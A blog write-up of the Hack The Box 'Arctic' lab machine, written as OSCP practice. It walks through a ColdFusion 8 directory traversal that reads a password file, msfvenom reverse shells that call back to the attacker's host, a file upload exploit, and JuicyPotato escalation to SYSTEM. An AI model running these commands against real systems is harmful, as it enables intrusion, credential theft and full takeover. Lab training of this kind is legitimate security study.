Hack The Box: Arctic Write-up (#36)

5 min readNov 15, 2020

This is my 36th box out of 42 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.

Reconnaissance

As usual, run a full TCP scan.

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.11

-sC: Default Nmap script
-sV: Service/version info
-O: Enable OS detection
-oA: Output scan results in 3 different formats
-p-: Scan all ports from 1–65535

We get the back the following result:

Port 135: — Running Microsoft RPC.
Port 8500: — Running fmtp.
Port 49154: — Running Microsoft RPC.

Nmap scan report for 10.10.10.11
Host is up (0.0093s latency). 
                            
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC  
8500/tcp  open  fmtp? 
49154/tcp open  msrpc   Microsoft Windows RPC 
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
...

Before we begin, let’s do a quick mental note.

Port 8500 running fmtp service. A quick Google search reveals that Flight Message Transfer Protocol (FMTP) is a communication stack based on transmission control and internet protocols. Likely this will be our entry point to this target.
Port 135 and 49154 are associated with RPC service. It has very less chance to give us an initial foothold to this box. If required we’ll enumerate this service ports.

Service Enumeration

Port 8500 (fmtp)

We can visit this service from the browser.

Open both links.

administrator/ path seems to be interesting. Let's visit that path.

We have Adobe Coldfusion 8 admin login page. I tried a few common credentials but not working. This version of Adobe ColdFusion released on July 30, 2007. Quite an outdated version. Checking for the software exploit in searchsploit gives quite many vulnerabilities.

There are 2 exploits that we are interested to test, 14641 and 16788. The first one 14641 vulnerable to directory traversal. Check the code.

# Working GET request courtesy of carnal0wnage:                                                                                     
# http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en         
#                                                                                                                                   
# LLsecurity added another admin page filename: "/CFIDE/administrator/enter.cfm"

We don't have to run the exploit, just visit the path and it gives us hashed password.

Checking the source code of the page, we can see this password is hashed with SHA-1 and then HMAC-ed with salt.

All these done at client-site. I already spent the time to understand how is this work by reading Rana Khalil post for this box here. She had explained in depth. Please feel free to check them out. I am not going to use this method to exploit. So I am going to use 16788 exploit which is file upload vulnerability. This is Metasploit version but I found a manual way to exploit this vulnerability by using Python script written by Arrexel.

Exploitation

Copy the script from here and save it locally on our Kali Linux.

Generate reverse shell payload with JSP file format.

msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.31 lport=53 -o reveseshell.jsp

Next, run the exploit.

python exploit.py 10.10.10.11 8500 shell.jsp

The exploit tells us where the payload file was saved.

Set up a Netcat listener on our Kali Linux.

nc -nlvp 53

Then visit the payload location either from the browser or curl command.

http://10.10.10.11:8500/userfiles/file/exploit.jsp

Check back our listener.

We get a low privilege shell! Grab the user flag.

Post-Exploitation Enumeration

Let’s check the systeminfo to gather operating system details.

From the results above, this box is running Windows Server 2008 R2 x64 bit architecture. No patches have been installed. Save this output on our Kali Linux. Next, check the privilege of the current user.

The user has SeImpersonatePrivilege privilege enabled. We can use JuicyPotato to impersonate token to become SYSTEM.

Privilege Escalation

Download the JuicyPotate.exe x64 version binary file from Github page here. Then generate msfvenom reverse shell payload.

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.31 lport=53 -f exe -o reverse.exe

Next, set up SMB share in your Kali Linux where JuicyPotato.exe and reverse.exe reside.

python /usr/share/doc/python3-impacket/examples/smbserver.py tools .

Copy these 2 files to the target.

C:\Users\tolis\Desktop>copy \\10.10.14.31\tools\JuicyPotato.exe .                                                                   
copy \\10.10.14.31\tools\JuicyPotato.exe .                                                                                          
        1 file(s) copied.
C:\Users\tolis\Desktop>copy \\10.10.14.31\tools\reverse.exe .
copy \\10.10.14.31\tools\reverse.exe .
        1 file(s) copied.

Set up another Netcat listener on Kali Linux.

nc -nlvp 53

From the target machine run the following command.

JuicyPotato.exe -l 1337 -p C:\Users\tolis\Desktop\reverse.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1–4291–83b6–3328366b9097})

For CLSID list you can find here. For a different version of OS, you need that version of CLSID (any one from the list will do).

Go back to the listener.